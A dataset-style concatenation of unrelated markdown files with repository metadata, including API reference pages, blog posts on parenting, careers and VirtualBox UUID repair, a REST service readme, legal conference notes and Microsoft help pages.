3d35961a961b5a2129b1d42f1d118972d9665357
[ "MIT" ]
null
null
null
[This file should be used to provide the student with just enough background to complete the tasks given in `instructions.md`. Additional details should be saved for `after.md`]
44.5
79
0.797753
eng_Latn
0.999672
5385360d0bf5ef27db9e864d3a26cb632a6fa188
1,918
md
Markdown
docs/framework/unmanaged-api/hosting/imanagedobject-getobjectidentity-method.md
JosephHerreraDev/docs.es-es
dd545ff8c6bc59a76ff761c43b14c7f05127c91a
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/framework/unmanaged-api/hosting/imanagedobject-getobjectidentity-method.md
JosephHerreraDev/docs.es-es
dd545ff8c6bc59a76ff761c43b14c7f05127c91a
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/framework/unmanaged-api/hosting/imanagedobject-getobjectidentity-method.md
JosephHerreraDev/docs.es-es
dd545ff8c6bc59a76ff761c43b14c7f05127c91a
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: IManagedObject::GetObjectIdentity (Método)
ms.date: 03/30/2017
api_name:
- IManagedObject.GetObjectIdentity
api_location:
- mscoree.dll
api_type:
- COM
f1_keywords:
- GetObjectIdentity
helpviewer_keywords:
- GetObjectIdentity method [.NET Framework hosting]
- IManagedObject::GetObjectIdentity method [.NET Framework hosting]
ms.assetid: b862ff3e-e480-4cdf-84e2-e1013334a467
topic_type:
- apiref
ms.openlocfilehash: 1b40ed8e107d30c22b4ade25d29376b1b74583d1
ms.sourcegitcommit: e5772b3ddcc114c80b4c9767ffdb3f6c7fad8f05
ms.translationtype: MT
ms.contentlocale: es-ES
ms.lasthandoff: 05/26/2020
ms.locfileid: "83842418"
---
# <a name="imanagedobjectgetobjectidentity-method"></a>IManagedObject::GetObjectIdentity (Método)

Obtiene la identidad de este objeto administrado.

## <a name="syntax"></a>Sintaxis

```cpp
HRESULT GetObjectIdentity (
   [out] BSTR*   pBSTRGUID,
   [out] int*    AppDomainID,
   [out] CCW_PTR pCCW
);
```

## <a name="parameters"></a>Parámetros

`pBSTRGUID`
[out] Puntero al GUID del proceso en el que reside el objeto.

`AppDomainID`
[out] Puntero al identificador del dominio de aplicación del objeto.

`pCCW`
[out] Puntero al índice de un objeto en la tabla v clásica de COM.

## <a name="remarks"></a>Notas

La identidad de un objeto administrado incluye el GUID del proceso, el identificador del dominio de aplicación y el índice del objeto en la tabla v clásica de COM.

## <a name="requirements"></a>Requisitos

**Plataformas:** Vea [Requisitos de sistema](../../get-started/system-requirements.md).

**Encabezado:** MSCorEE.h

**Biblioteca:** Se incluye como recurso en MSCorEE.dll

**.NET Framework versiones:** [!INCLUDE[net_current_v20plus](../../../../includes/net-current-v20plus-md.md)]

## <a name="see-also"></a>Vea también

- [IManagedObject (Interfaz)](imanagedobject-interface.md)
30.444444
166
0.730448
spa_Latn
0.413844
53858982bab21b66074e9ab1d45310f395c1b7f9
354
md
Markdown
_projects/template.md
rguidice/personal-website
c044c4182696fe03b61cb605949974d36b41fb65
[ "MIT" ]
null
null
null
_projects/template.md
rguidice/personal-website
c044c4182696fe03b61cb605949974d36b41fb65
[ "MIT" ]
null
null
null
_projects/template.md
rguidice/personal-website
c044c4182696fe03b61cb605949974d36b41fb65
[ "MIT" ]
null
null
null
--- name: template date: 2018-05-16 tools: [Raspberry Pi, MagicMirror, Bash] image: /assets/project_images/Building_a_MagicMirror/magicmirror_final_product.JPG blog: 0 for no blog, 1 for blog, write blog below in markdown github: https://github.com/rguidice/sensehat-ddr (remove github tag for no github link) description: A Fun Project and Cool Gift ---
39.333333
87
0.785311
yue_Hant
0.207904
5385cc99b05c376c011af98f22c843c853b37205
829
md
Markdown
content/reference/services/SoftLayer_Account_Internal_Ibm/getAccountTypes.md
edsonarios/githubio_source
8d92ebf5c49a3ba0d18702062f5744b5c308b646
[ "Apache-2.0" ]
null
null
null
content/reference/services/SoftLayer_Account_Internal_Ibm/getAccountTypes.md
edsonarios/githubio_source
8d92ebf5c49a3ba0d18702062f5744b5c308b646
[ "Apache-2.0" ]
null
null
null
content/reference/services/SoftLayer_Account_Internal_Ibm/getAccountTypes.md
edsonarios/githubio_source
8d92ebf5c49a3ba0d18702062f5744b5c308b646
[ "Apache-2.0" ]
null
null
null
--- title: "getAccountTypes" description: "Validates request and, if the request is approved, returns a list of allowed uses for an automatically created IBMer Iaa... " layout: "method" tags: - "method" - "sldn" - "Account" classes: - "SoftLayer_Account_Internal_Ibm" aliases: - "/reference/services/softlayer_account_internal_ibm/getAccountTypes" --- # [SoftLayer_Account_Internal_Ibm](/reference/services/SoftLayer_Account_Internal_Ibm)::getAccountTypes Retrieves allowed internal IBM account categories ## Overview Validates request and, if the request is approved, returns a list of allowed uses for an automatically created IBMer IaaS account. ----- ### Parameters |Name | Type | Description | | --- | --- | --- | ### Required Headers * authenticate ### Return Values * array of strings
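For orientation only, a hedged PHP sketch of how this method might be invoked. The client bootstrap below follows the general pattern of the legacy softlayer-api-php-client; the include path, the credentials, and access to this internal service are all assumptions rather than anything this page documents:

```php
<?php
// Hypothetical sketch: assumes the softlayer-api-php-client library is installed
// and that the caller is authorized to use this internal IBM service.
require_once 'SoftLayer/SoapClient.class.php';

$apiUsername = 'set-me'; // assumption: your API username
$apiKey      = 'set-me'; // assumption: your API key

$client = SoftLayer_SoapClient::getClient(
    'SoftLayer_Account_Internal_Ibm', // the service documented on this page
    null,                             // no initialization id for this call
    $apiUsername,
    $apiKey
);

// getAccountTypes takes no parameters and returns an array of strings.
$accountTypes = $client->getAccountTypes();
print_r($accountTypes);
```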
20.725
139
0.726176
eng_Latn
0.861514
53861699c02f51460ddd4dfc42862f8391e56d4f
44
md
Markdown
ChangeLog.md
akito19/htrs
5b0503d3684fb21c1906da6598b2ee3f0f143861
[ "BSD-3-Clause" ]
null
null
null
ChangeLog.md
akito19/htrs
5b0503d3684fb21c1906da6598b2ee3f0f143861
[ "BSD-3-Clause" ]
2
2020-04-27T14:23:55.000Z
2020-04-27T14:24:23.000Z
ChangeLog.md
akito19/htrs
5b0503d3684fb21c1906da6598b2ee3f0f143861
[ "BSD-3-Clause" ]
null
null
null
# Changelog for htrs ## Unreleased changes
11
21
0.75
eng_Latn
0.985334
538629102c3004ba5da6ed543d16ec3cf0b11cc7
1,602
md
Markdown
_posts/fr/papa/2016/2016-03-04-la-mort.md
ashmaroli/borisschapira.com
6d7c5032d0c00212b0eb5de023a2a883169cbed6
[ "MIT" ]
null
null
null
_posts/fr/papa/2016/2016-03-04-la-mort.md
ashmaroli/borisschapira.com
6d7c5032d0c00212b0eb5de023a2a883169cbed6
[ "MIT" ]
null
null
null
_posts/fr/papa/2016/2016-03-04-la-mort.md
ashmaroli/borisschapira.com
6d7c5032d0c00212b0eb5de023a2a883169cbed6
[ "MIT" ]
null
null
null
---
title: 'Death'
date: '2016-03-04'
type: post
locale: fr_FR
---

We are in the car. I brake and stop to let a man and his little dog cross at the pedestrian crossing. That catches the attention of my eldest, strapped into his booster seat in the back.

> — Why you stop the car?
> — To let the man and his dog cross, you see.
> — Ah yes, a little dog. A tiny little dog.

I can tell from that last sentence that he's mulling something over… I wait for him to speak again. Sure enough:

> — Mamie's little dog, Bidule, he died.
> — Yes sweetheart, he died. He was old.
> — Sonam is dead too, one day, later.
> — Yes sweetheart, he's a dog too. One day he will be old and die.
> — You too is dead, one day?
> — Yes my love. Everyone grows old and dies one day.

He bursts into tears; I realize he wasn't ready.

> I'm sorry, my angel, don't worry. Everything is fine, Papa is here.

Nothing helps; I can hear him crying in the back.

> Sweetheart, everything is fine, nothing is going to happen to me, you know. I'm here, and so are you: see, we're not dead!

I hear him calming down, then he explains:

> — I got scared, Papa, I don't want to be dead one day!
> — Don't worry, sweetheart.
> — Ah, but you, you can be dead one day, Papa.
> — Oh, so I can die but not you?
> — Yes, Papa. **You are already old, very old**!

{% include video_as_a_gif.html.liquid url="/assets/image/papa/2016-03-04/1" alt="An animated image of John Cusack, incredulous. Sorry, I don't know which movie it's from" caption="Me, old?" %}
34.826087
176
0.689139
fra_Latn
0.995222
53864f5cdda58eab5d3f947d55378d2111b581ce
6,821
md
Markdown
src/posts/2016-11-18-the-trail-behind-me.md
subvisual/subvisual.com
758c29017ed10c1ac5b0f632907c41d68a59c841
[ "MIT" ]
3
2020-02-12T21:37:21.000Z
2020-10-07T15:52:40.000Z
src/posts/2016-11-18-the-trail-behind-me.md
subvisual/subvisual.com
758c29017ed10c1ac5b0f632907c41d68a59c841
[ "MIT" ]
78
2019-04-12T12:29:21.000Z
2022-02-26T10:18:36.000Z
src/posts/2016-11-18-the-trail-behind-me.md
subvisual/subvisual.com
758c29017ed10c1ac5b0f632907c41d68a59c841
[ "MIT" ]
5
2019-06-19T14:03:56.000Z
2020-10-15T16:44:19.000Z
---
path: /posts/117-the-trail-behind-me/
title: "The Trail Behind Me"
author: pedro-costa
date: 2016-11-18
cover: https://subvisual.s3.amazonaws.com/blog/hero/185/[email protected]
tags:
- general
intro: "It has already been a year since my first day at Subvisual. I was no stranger to working with this team then. I made a point of joining the RubyConf Portugal organisation team ever since the idea first came up and I've been involved in all the meetups and activities that I could. Nonetheless, I thought a recap of the events, both those that led me here and those since I've been here, would be a fitting way to celebrate the achievement."
---

It has already been a year since my first day at Subvisual. I was no stranger to working with this team then. I made a point of joining the RubyConf Portugal organisation team ever since the idea first came up and I've been involved in all the meetups and activities that I could. Nonetheless, I thought a recap of the events, both those that led me here and those since I've been here, would be a fitting way to celebrate the achievement.

## Before

Subvisual was not the first company I worked at after college, although that was the initial plan. For many reasons, it just did not happen back then.

My first job out of college was at a mid-sized international company, mostly working with Java EE. I started in the services team, putting out fires for one of their largest customers, but they soon realised I tend to over-engineer things. And, for the first time before or since, they welcomed and nurtured that part of me. They tested me with some scripts to automate operations tasks, and after I nailed those they moved me to the engineering team, where I went about learning everything I could, from new frameworks to security mechanisms.

After little more than a year there, I got an offer to work at another company. Better pay, and I would help build a team that I would lead. It was just too good to refuse. I could be a lead developer by the age of 25. So I took the plunge. It started well. I learned Elixir before version 1.0 was even out (building an aggregator service), worked on a Rails project with some fuzzy requirements, and on a cross-platform application using the Adobe Flex framework. But in the end it did not live up to my expectations; I wasn't progressing. And so I left.

I joined Subvisual soon after that but, in retrospect, both companies taught me valuable lessons. I learned to accept myself and to use my strengths to work on my weaknesses; I found my drive, and I now try to build upon it; and I learned that evolution is the one thing I should constantly aim for.

## Occam site

![file](https://subvisual.s3.amazonaws.com/blog/post_image/226/original.jpeg)

My first project at Subvisual was a static site for Occam Education. Sounds simple enough, right? Turns out it was also my worst estimate to date.

While I had known most of the team for a while then, I underestimated their drive for quality. Unlike mine, it did not come from a place of over-engineering and pedantic look-ahead. Their methods and tools had been battle-tested and had a purpose. And they were all new to me. I learned mostly about Middleman and SuitCSS, having stretched both to their limits, and had extended discussions with Bruno about all the philosophy behind how the team builds pages. And it eventually made sense. I just regret that it took more than five times the estimated time, but the truth is that I've since been more careful with the estimates I give. Underpromise and overachieve.
That site is still live, although it may have changed a little since I last touched it. You can check it out at [http://occameducation.com/](http://occameducation.com/) . ## Cadoo ![file](https://subvisual.s3.amazonaws.com/blog/post_image/224/original.jpeg) Cadoo was an interesting one. I joined Miguel in what was to be basically a rethink of [Easy Money](https://subvisual.co/case-studies/easy-money/), a previous project using [Uphold](https://uphold.com/)'s API to facilitate money transfers. Cadoo ended up being the first of multiple projects using that API to help people interact with each other using money. The project itself was a great opportunity to tune-up my Rails skills with someone who had a lot more experience, and for both of us to learn React. We pushed the boundaries of my experience with Rails and even tried some patterns I only had had the opportunity to use in Java projects. In fact, there is a whole chain of service objects in that project just to generate the dynamic image that goes into the e-mails (I'm kinda proud of that one). As for the frontend, we pushed the limits of CSS transitions, using React to quickly adapt the classes in the markup to the state we wanted to show. Turns out this got so cool Miguel even made some talks about it. The project is live and running, so feel free to try it at [https://cadoo.io/](https://cadoo.io/) . ## Crediflux ![file](https://subvisual.s3.amazonaws.com/blog/post_image/225/original.jpeg) After Cadoo I paired with Bruno once again, now to develop a platform for companies to perform easier credit analysis. The backend was Rails, but the frontend was a new combo of Angular.js and Redux. I got to admit it took me a while to get my head around it. I was not familiar with Redux, much less with Angular.js to Bruno's proficiency level. And, as is usual when you face an expert in a technology which is new to you, I got off to a bumpy start. A file uploader, which had taken me less than a day in Cadoo, took me almost two weeks in this project, mostly due to my inexperience. When I joined the project Bruno had already been with it for almost a year. Eventually, he ended up moving to another project, and I got to be on my own for the first time at Subvisual. I tried to step up to the responsibility and took it through the last mile. We released the first version in August. Since then we've helped Crediflux set up its own team, and they already have some client installations coming soon. The project has already gathered some media attention, but if you haven't heard of them take a peek at [https://crediflux.pt/](https://crediflux.pt/) . ## Conclusion The truth is that I never made any decision about my professional path where an offer from Subvisual wasn't on the table in one way or another. It always seemed like just a matter of time until I joined these ranks. This is a team I truly admire, both collectively and every single one individually. I am ever so proud to be one of them and can't wait to find out the next thing I'm going to learn as part of this team. *Curious about this team's frame of mind? Check [this post](https://subvisual.co/blog/posts/77) by João to know a little more about the company and the philosophies behind our work.*
101.80597
548
0.779504
eng_Latn
0.99992
5386e7c15354626c1a3ff64a6b86a0f471fe0b98
1,212
md
Markdown
README.md
shawnwhiteside/example-todo-rest-service
d28cf226571ef6b85e2f38b8a93cc2734271caac
[ "Apache-2.0" ]
null
null
null
README.md
shawnwhiteside/example-todo-rest-service
d28cf226571ef6b85e2f38b8a93cc2734271caac
[ "Apache-2.0" ]
null
null
null
README.md
shawnwhiteside/example-todo-rest-service
d28cf226571ef6b85e2f38b8a93cc2734271caac
[ "Apache-2.0" ]
null
null
null
# example-todo-rest-service

Postman Requests

GET /todo/ HTTP/1.1
Host: localhost:8080
Cache-Control: no-cache
Postman-Token: 5840f3b5-2a04-b057-b37b-039ae85cdfc0

GET /todo/37683a56-6604-4e24-adc5-69edf830d847 HTTP/1.1
Host: localhost:8080
Cache-Control: no-cache
Postman-Token: 72b1050c-d7bc-cf8e-46b3-fe64b46420b4

POST /todo HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Cache-Control: no-cache
Postman-Token: d5bef4f7-6a2c-9b2d-ebc3-0cd8ee634458

{"title":"title45", "description":"description45", "dueDate":"2018-01-01T09:50:00"}

POST /todo/bulk HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Cache-Control: no-cache
Postman-Token: 18604e4e-d9c7-bb61-6774-d131d69e7322

[
 {"title":"title55", "description":"description55", "dueDate":"2018-01-01T09:50:00"},
 {"title":"title599", "dueDate":"2018-01-01T09:50:00"},
 {"title":"title599", "description":"description57", "dueDate":"2018-01-01T09:50:00"}
]

PATCH /todo/37683a56-6604-4e24-adc5-69edf830d847 HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Cache-Control: no-cache
Postman-Token: 6be0065e-7268-d0ee-59d9-605e73d4efa4

{"title":"title1", "description":"description1", "dueDate":"2018-01-01T09:50:00"}
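Since the dumps above are raw Postman captures, here is a hedged sketch of the first request as client code; the endpoint and port are taken from the captures, while the cURL plumbing is ordinary PHP and not part of this service:

```php
<?php
// Minimal sketch: list all todos from the service captured above.
$ch = curl_init('http://localhost:8080/todo/');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);
curl_close($ch);

// The service presumably returns JSON, so decode it into an array.
$todos = json_decode($response, true);
print_r($todos);
```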
27.545455
85
0.758251
yue_Hant
0.31957
53870de88f3aee878fe6826215af3de884d3d6c6
2,222
md
Markdown
access/Concepts/Miscellaneous/cancel-method-example-vbscript.md
CeptiveYT/VBA-Docs
1d9c58a40ee6f2d85f96de0a825de201f950fc2a
[ "CC-BY-4.0", "MIT" ]
283
2018-07-06T07:44:11.000Z
2022-03-31T14:09:36.000Z
access/Concepts/Miscellaneous/cancel-method-example-vbscript.md
CeptiveYT/VBA-Docs
1d9c58a40ee6f2d85f96de0a825de201f950fc2a
[ "CC-BY-4.0", "MIT" ]
1,457
2018-05-11T17:48:58.000Z
2022-03-25T22:03:38.000Z
access/Concepts/Miscellaneous/cancel-method-example-vbscript.md
CeptiveYT/VBA-Docs
1d9c58a40ee6f2d85f96de0a825de201f950fc2a
[ "CC-BY-4.0", "MIT" ]
469
2018-06-14T12:50:12.000Z
2022-03-27T08:17:02.000Z
---
title: Cancel method example (VBScript)
ROBOTS: INDEX
ms.prod: access
ms.assetid: 3c5a14fa-f4b1-6c32-9014-505817c6e4cf
ms.date: 06/08/2019
ms.localizationpriority: medium
---

# Cancel method example (VBScript)

**Applies to:** Access 2013 | Access 2016

The following example shows how to use the [Cancel](https://msdn.microsoft.com/library/747edc04-a5cc-3631-2d0b-82e7e41a76b7%28Office.15%29.aspx) method at run time. Cut and paste the following code to Notepad or another text editor and save it as **CancelVBS.asp**. You can view the result in any client browser.

```vb
<!-- BeginCancelVBS -->
<Script Language="VBScript">
<!--
Sub cmdCancelAsync_OnClick
    ' Terminates currently running AsyncExecute,
    ' ReadyState property set to adcReadyStateLoaded,
    ' Recordset set to Nothing
    ADC.Cancel
End Sub

Sub cmdRefreshTable_OnClick
    ADC.Refresh
End Sub
-->
</Script>

<OBJECT CLASSID="clsid:BD96C556-65A3-11D0-983A-00C04FC29E33" ID="ADC">
    <PARAM NAME="SQL" VALUE="Select FirstName, LastName from Employees">
    <PARAM NAME="CONNECT" VALUE="Provider='sqloledb';Integrated Security='SSPI';Initial Catalog='Northwind'">
    <PARAM NAME="Server" VALUE="https://<%=Request.ServerVariables("SERVER_NAME")%>">
</OBJECT>

<TABLE DATASRC=#ADC>
    <TBODY>
        <TR>
            <TD><SPAN DATAFLD="FirstName"></SPAN></TD>
            <TD><SPAN DATAFLD="LastName"></SPAN></TD>
        </TR>
    </TBODY>
</TABLE>

<FORM>
    <INPUT type="button" value="Refresh" id=cmdRefreshTable name=cmdRefreshTable>
    <INPUT type="button" value="Cancel" id=cmdCancelAsync name=cmdCancelAsync>
</FORM>
<!-- EndCancelVBS -->
```

## See also

- [Access for developers forum](https://social.msdn.microsoft.com/Forums/office/home?forum=accessdev)
- [Access help on support.office.com](https://support.office.com/search/results?query=Access)
- [Access help on answers.microsoft.com](https://answers.microsoft.com/)
- [Access forums on UtterAccess](https://www.utteraccess.com/forum/index.php?act=idx)
- [Access developer and VBA programming help center (FMS)](https://www.fmsinc.com/MicrosoftAccess/developer/)
- [Access posts on StackOverflow](https://stackoverflow.com/questions/tagged/ms-access)

[!include[Support and feedback](~/includes/feedback-boilerplate.md)]
45.346939
314
0.741224
yue_Hant
0.708915
538715490f2e7517abad5b33546594da0b14d1f8
2,014
md
Markdown
conferences/law-and-ai-abo-akademi/tuomas-poysti-legal-certainty-and-right-to-a-human-face.md
smspillaz/reading
b9c014906296162db61886e4e9e8600dbfce2b84
[ "MIT" ]
1
2022-03-10T06:07:19.000Z
2022-03-10T06:07:19.000Z
conferences/law-and-ai-abo-akademi/tuomas-poysti-legal-certainty-and-right-to-a-human-face.md
smspillaz/reading
b9c014906296162db61886e4e9e8600dbfce2b84
[ "MIT" ]
null
null
null
conferences/law-and-ai-abo-akademi/tuomas-poysti-legal-certainty-and-right-to-a-human-face.md
smspillaz/reading
b9c014906296162db61886e4e9e8600dbfce2b84
[ "MIT" ]
null
null
null
Legal certainty means multiple qualities:
- Accessibility of law
- Relative stability of law and decisions based on them
- Plausibility
- Intelligibility
- Understandability

Both persons and corporations can align their activities in advance in accordance with the requirements of the law. Absence of arbitrary use of power. Legal certainty requires accountability for the use of power. Legitimate expectations and fair treatment.

Automation attempts are not new, and automation extends beyond AI and covers both decisionmaking and service production & decision support systems.

Finnish Constitutional Law Committee positions and prior constitutionality review opinions on automation and automated decisionmaking:
1. Proper legal bases and legislated safeguards on good administration
2. How to handle risks? Substantive element in light of section 21 of the constitution.

Automated assistance of the decisions etc - how they had been organized.

Article 22 of the GDPR: Requires specific national legislation on the use of fully automated decisionmaking.

The legislator's eventual role is much broader than simply to provide the formal authorisation for ADM, but also to safeguard good administration. A minimalistic legislative role should be rejected. The other alternative, a risk-centric view.

Apart from administrative review and judicial review, we need to strengthen legality supervision for law proposals. Oversight on a systemic basis; this system complements the system of control by the courts.

Transparency-related question: What research should the lawmaker engage in when it comes to understanding and finding that certain documents are to be deemed public?
- Is mere publication of the source code sufficient? How can you ensure that the published models are understandable?
- Judgement in Gothenburg: "algorithm and source code" is a public document. There were no IP issues because the ownership of the source code had been transferred to the municipality.
61.030303
241
0.820755
eng_Latn
0.999303
538868c2b76dfe496ff1a25a04099fa98f6703a5
3,743
md
Markdown
_posts/2018-12-6-how-to-set-uuid.md
atnimak/atnimak.github.io
45560d06efc76a5eec4bd7d9426ebc36247b0a9b
[ "MIT" ]
null
null
null
_posts/2018-12-6-how-to-set-uuid.md
atnimak/atnimak.github.io
45560d06efc76a5eec4bd7d9426ebc36247b0a9b
[ "MIT" ]
null
null
null
_posts/2018-12-6-how-to-set-uuid.md
atnimak/atnimak.github.io
45560d06efc76a5eec4bd7d9426ebc36247b0a9b
[ "MIT" ]
null
null
null
---
layout: post
title: How to set a UUID and fix the 0x80004005 "UUID doesn't match" error
tags: virtualbox
---
After creating a snapshot, or after moving a .vhd or .vdi file, starting the virtual machine fails with the error 0x80004005 "UUID doesn't match".

---
<script type="text/javascript" src="/public/js/jssor.slider.min.js"></script>

The error text looks roughly like this:

```
Fehlercode: E_FAIL (0x80004005)
Component: ProgressProxy
Interface: IProgress {c20238e4-3221-4d3f-8891-81ce92d9f913}
```

In this case the virtual machine manager shows an error saying that the snapshot's parent UUID does not match the UUID of the parent disk stored in the media registry `c: \ Users \ Username \ .virtualbox \ VirtualBox.xml.`

or

```
Parent UUID {00000000-0000-0000-0000-000000000000} of the medium ‘C:\Users\Username\VirtualBox VMs\XP-nik\Snapshots\{5ad80a47-8509-4b7d-9955-44bf137a77c7}.vhd’ does not match UUID {94b27e89-d561-4449-a1a7-83c2f1dd8d12} of its parent medium stored in the media registry (‘C:\Users\Username\.VirtualBox\VirtualBox.xml’).

error code: E_FAIL (0x80004005)
```

As in the first case, the snapshot's parent UUID does not match the UUID of the parent disk stored in the media registry `c: \ Users \ Username \ .virtualbox \ VirtualBox.xml.` We can fix this.

First, run cmd.exe as administrator and change to the directory where VirtualBox is installed.

## The first case

We need to get the UUID of the parent disk

```
D:\> vboxmanage internalcommands dumphdinfo harddisk0.vdi
--- Dumping VD Disk, Images=1
Dumping VD image "harddisk0.vdi" (Backend=VHD)
Header: Geometry PCHS=20573/16/255 LCHS=0/0/0 cbSector=512
Header: uuidCreation={b76d8026-e222-470a-9c83-bc91351bb307}
Header: uuidParent={00000000-0000-0000-0000-000000000000}
```

and the snapshot's properties:

```
D:\>vboxmanage internalcommands dumphdinfo "c:\Users\UserName\VirtualBox VMs\VMName\Snapshots\{fdb2b61d-2212-45cc-8d29-b9f598d06f39}.vhd"
--- Dumping VD Disk, Images=1
Dumping VD image "c:\Users\UserName\VirtualBox VMs\VMName\Snapshots\{fdb2b61d-2212-45cc-8d29-b9f598d06f39}.vhd" (Backend=VHD)
Header: Geometry PCHS=20573/16/255 LCHS=0/0/0 cbSector=512
Header: uuidCreation={fdb2b61d-2212-45cc-8d29-b9f598d06f39}
Header: uuidParent={00000000-0000-0000-0000-000000000000}
```

The snapshot's parent UUID (00000000-0000-0000-0000-000000000000) is set incorrectly. Let's set the correct parent UUID on the snapshot:

```
D:\>VBoxManage.exe internalcommands sethdparentuuid "c:\Users\UserName\VirtualBox VMs\VMName\Snapshots\{fdb2b61d-2212-45cc-8d29-b9f598d06f39}.vhd" {b76d8026-e222-470a-9c83-bc91351bb307}
UUID changed to: b76d8026-e222-470a-9c83-bc91351bb307
```

Now the virtual machine should work correctly: it should boot, and the latest snapshot should be available.

## The second case

```
Parent UUID {00000000-0000-0000-0000-000000000000} of the medium ‘C:\Users\Username\VirtualBox VMs\XP-nik\Snapshots\{5ad80a47-8509-4b7d-9955-44bf137a77c7}.vhd’ does not match UUID {94b27e89-d561-4449-a1a7-83c2f1dd8d12} of its parent medium stored in the media registry (‘C:\Users\Username\.VirtualBox\VirtualBox.xml’).

error code: E_FAIL (0x80004005)
```

The error message already gives us the snapshot's UUID and the correct UUID of the parent disk, so all that remains is to assign the correct parent UUID to the snapshot:

```
C:\Program Files\Oracle\VirtualBox>VBoxManage.exe internalcommands sethdparentuuid C:\Users\nik.NUTEP\VirtualBox VMs\XP-nik\Snapshots\{5ad80a47-8509-4b7d-9955-44bf137a77c7}.vhd {94b27e89-d561-4449-a1a7-83c2f1dd8d12}
```

After that, the virtual machine should work correctly.

This solution also works when your virtual machine's vhd files are not in the VM's default folder and snapshots occasionally lose their parents.
47.987179
318
0.79642
rus_Cyrl
0.254957
5388a5a3dfd424db95778ebc659bf1ade22ecd07
2,238
md
Markdown
AlchemyInsights/set-up-cloud-auto-attendant.md
isabella232/OfficeDocs-AlchemyInsights-pr.nb-NO
e72dad0e24e02cdcb7eeb3dd8c4fc4cf5ec56554
[ "CC-BY-4.0", "MIT" ]
2
2020-05-19T19:07:15.000Z
2021-03-06T00:34:53.000Z
AlchemyInsights/set-up-cloud-auto-attendant.md
isabella232/OfficeDocs-AlchemyInsights-pr.nb-NO
e72dad0e24e02cdcb7eeb3dd8c4fc4cf5ec56554
[ "CC-BY-4.0", "MIT" ]
3
2020-06-02T23:25:08.000Z
2022-02-09T06:52:49.000Z
AlchemyInsights/set-up-cloud-auto-attendant.md
isabella232/OfficeDocs-AlchemyInsights-pr.nb-NO
e72dad0e24e02cdcb7eeb3dd8c4fc4cf5ec56554
[ "CC-BY-4.0", "MIT" ]
2
2019-10-09T20:30:02.000Z
2020-06-02T23:24:46.000Z
--- title: Konfigurere en automatisk skytjeneste ms.author: pebaum author: pebaum manager: scotv ms.date: 09/21/2021 ms.audience: Admin ms.topic: article ms.service: o365-administration ROBOTS: NOINDEX, NOFOLLOW localization_priority: Normal ms.collection: Adm_O365 ms.custom: - "9000548" - "13682" ms.openlocfilehash: a6a8ac13e86ac0c6b9fa31135549d343ec0b9423 ms.sourcegitcommit: a097d1f8915a31ed8460b5b68dccc8d87e563cc0 ms.translationtype: MT ms.contentlocale: nb-NO ms.lasthandoff: 09/22/2021 ms.locfileid: "59506908" --- # <a name="set-up-a-cloud-auto-attendant"></a>Konfigurere en automatisk skytjeneste Trenger du hjelp til å konfigurere en automatisk skytjeneste? Abonnementet på over 150 kvalifiserte lisenser omfatter tilgang til FastTrack spesialister som eksternt kan hjelpe deg med å konfigurere og konfigurere funksjoner i telefonsystemet, for eksempel automatisk skytjeneste. Hvis du vil ha mer informasjon, kan [du se Kvalifisering og FastTrack for Microsoft 365.](https://docs.microsoft.com/fasttrack/introduction#what-is-fasttrack-for-microsoft-365) [](https://docs.microsoft.com/fasttrack/eligibility) Hvis du vil sende inn en forespørsel om hjelp til å konfigurere automatisk skybasert svartjeneste for organisasjonen, logger du på [Fast Track](https://www.microsoft.com/fasttrack?rtc=1). Automatiske deltakere har for øyeblikket bestemte lisensieringskrav. Hvis du vil lære hvordan du oppretter og konfigurerer Teams automatiske deltakere, kan du se Planlegge for Teams automatiske deltaker- og [samtalekøer](https://docs.microsoft.com/microsoftteams/what-are-phone-system-auto-attendants). Hvis du vil ha mer informasjon om hvordan du bruker en skybasert deltaker med Microsoft Teams, kan du se: - [Konfigurere en automatisk svardeltaker](https://docs.microsoft.com/microsoftteams/create-a-phone-system-auto-attendant) - [Opprette en samtalekø](https://docs.microsoft.com/microsoftteams/create-a-phone-system-call-queue) - [Svar automatisk svar og anropskøsamtaler direkte fra Teams](https://docs.microsoft.com/microsoftteams/answer-auto-attendant-and-call-queue-calls) - [Microsoft 365 produkter og funksjoner som støttes av FastTrack](https://docs.microsoft.com/fasttrack/products-and-capabilities#office-365)
57.384615
302
0.816354
nob_Latn
0.908288
538970637165e1472ae8f4df0c6edd82c2d8e280
196
md
Markdown
pages/system-components/ansible-tower/controls/NIST-800-53-PL-5.md
ComplianceAsCode/uswds-opencontrol
0b068f8433018c4b603057e1088a9930e9b303c5
[ "CC0-1.0" ]
null
null
null
pages/system-components/ansible-tower/controls/NIST-800-53-PL-5.md
ComplianceAsCode/uswds-opencontrol
0b068f8433018c4b603057e1088a9930e9b303c5
[ "CC0-1.0" ]
null
null
null
pages/system-components/ansible-tower/controls/NIST-800-53-PL-5.md
ComplianceAsCode/uswds-opencontrol
0b068f8433018c4b603057e1088a9930e9b303c5
[ "CC0-1.0" ]
null
null
null
# NIST-800-53-PL-5
## Privacy Impact Assessment

#### Description

"[Withdrawn: Incorporated into Appendix J, AR-2]."

No information found for the combination of standard NIST-800-53 and control PL-5
32.666667
81
0.765306
eng_Latn
0.8478
5389860642d645ff86ee55ce6cc7f70d97eaf2cc
1,564
md
Markdown
README.md
hhergeth/Light-Transport-Bibliography
b0ce00a4288ce652beaa183ab04af2b2d2f19528
[ "Unlicense" ]
4
2018-02-15T09:41:27.000Z
2018-10-23T19:19:26.000Z
README.md
hhergeth/Light-Transport-Bibliography
b0ce00a4288ce652beaa183ab04af2b2d2f19528
[ "Unlicense" ]
null
null
null
README.md
hhergeth/Light-Transport-Bibliography
b0ce00a4288ce652beaa183ab04af2b2d2f19528
[ "Unlicense" ]
null
null
null
